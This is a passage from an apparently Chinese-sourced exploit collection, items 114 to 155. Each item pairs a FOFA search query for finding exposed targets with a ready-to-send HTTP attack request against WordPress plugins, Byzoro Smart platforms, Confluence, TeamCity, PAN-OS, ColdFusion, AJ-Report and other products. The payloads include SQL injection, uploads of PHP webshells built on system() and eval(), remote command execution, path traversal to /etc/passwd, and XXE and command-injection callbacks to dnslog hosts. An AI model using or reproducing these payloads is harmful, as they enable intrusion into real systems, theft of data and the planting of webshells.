GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Byzoro (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

boot/web/upload/weblogo/1.php

122. Beijing Byzoro (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and below authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立迅) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun (建科立讯) communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
